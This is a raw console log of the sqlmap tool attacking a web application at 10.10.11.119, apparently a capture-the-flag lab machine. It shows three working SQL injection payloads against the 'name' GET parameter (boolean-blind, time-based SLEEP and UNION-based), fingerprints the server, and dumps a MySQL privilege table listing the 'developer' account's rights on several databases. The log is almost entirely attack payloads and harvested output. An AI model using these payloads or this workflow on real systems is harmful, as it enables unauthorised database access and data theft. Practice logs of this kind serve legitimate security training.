        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:39:40 /2022-03-24/

[10:39:40] [INFO] resuming back-end DBMS 'mysql' 
[10:39:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: name=admin') AND 5048=5048 AND ('DSTg'='DSTg

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=admin') AND (SELECT 5900 FROM (SELECT(SLEEP(5)))VdWE) AND ('oDmL'='oDmL

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: name=admin') UNION ALL SELECT NULL,NULL,CONCAT(0x716b6b6a71,0x43445972435844707479665054784f53446c414455726f5a75765766545a536756594b6b6e62785a,0x7162717071)-- -
---
[10:39:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:39:41] [INFO] fetching columns for table 'SCHEMA_PRIVILEGES' in database 'information_schema'
[10:39:41] [INFO] fetching entries for table 'SCHEMA_PRIVILEGES' in database 'information_schema'
Database: information_schema
Table: SCHEMA_PRIVILEGES
[24 entries]
+-------------------------+--------------+--------------+---------------+----------------+
| GRANTEE                 | IS_GRANTABLE | TABLE_SCHEMA | TABLE_CATALOG | PRIVILEGE_TYPE |
+-------------------------+--------------+--------------+---------------+----------------+
| 'developer'@'localhost' | YES          | logs         | def           | SELECT         |
| 'developer'@'localhost' | YES          | logs         | def           | INSERT         |
| 'developer'@'localhost' | YES          | logs         | def           | UPDATE         |
| 'developer'@'localhost' | YES          | logs         | def           | DELETE         |
| 'developer'@'localhost' | YES          | logs         | def           | CREATE         |
| 'developer'@'localhost' | YES          | logs         | def           | DROP           |
| 'developer'@'localhost' | YES          | logs         | def           | REFERENCES     |
| 'developer'@'localhost' | YES          | logs         | def           | ALTER          |
| 'developer'@'localhost' | YES          | cmsmsdb      | def           | SELECT         |
| 'developer'@'localhost' | YES          | cmsmsdb      | def           | INSERT         |
| 'developer'@'localhost' | YES          | cmsmsdb      | def           | UPDATE         |
| 'developer'@'localhost' | YES          | cmsmsdb      | def           | DELETE         |
| 'developer'@'localhost' | YES          | cmsmsdb      | def           | CREATE         |
| 'developer'@'localhost' | YES          | cmsmsdb      | def           | DROP           |
| 'developer'@'localhost' | YES          | cmsmsdb      | def           | REFERENCES     |
| 'developer'@'localhost' | YES          | cmsmsdb      | def           | ALTER          |
| 'developer'@'localhost' | YES          | Overflow     | def           | SELECT         |
| 'developer'@'localhost' | YES          | Overflow     | def           | INSERT         |
| 'developer'@'localhost' | YES          | Overflow     | def           | UPDATE         |
| 'developer'@'localhost' | YES          | Overflow     | def           | DELETE         |
| 'developer'@'localhost' | YES          | Overflow     | def           | CREATE         |
| 'developer'@'localhost' | YES          | Overflow     | def           | DROP           |
| 'developer'@'localhost' | YES          | Overflow     | def           | REFERENCES     |
| 'developer'@'localhost' | YES          | Overflow     | def           | ALTER          |
+-------------------------+--------------+--------------+---------------+----------------+

[10:39:41] [INFO] table 'information_schema.SCHEMA_PRIVILEGES' dumped to CSV file '/home/nn/.local/share/sqlmap/output/10.10.11.119/dump/information_schema/SCHEMA_PRIVILEGES.csv'
[10:39:41] [INFO] fetched data logged to text files under '/home/nn/.local/share/sqlmap/output/10.10.11.119'

[*] ending @ 10:39:41 /2022-03-24/

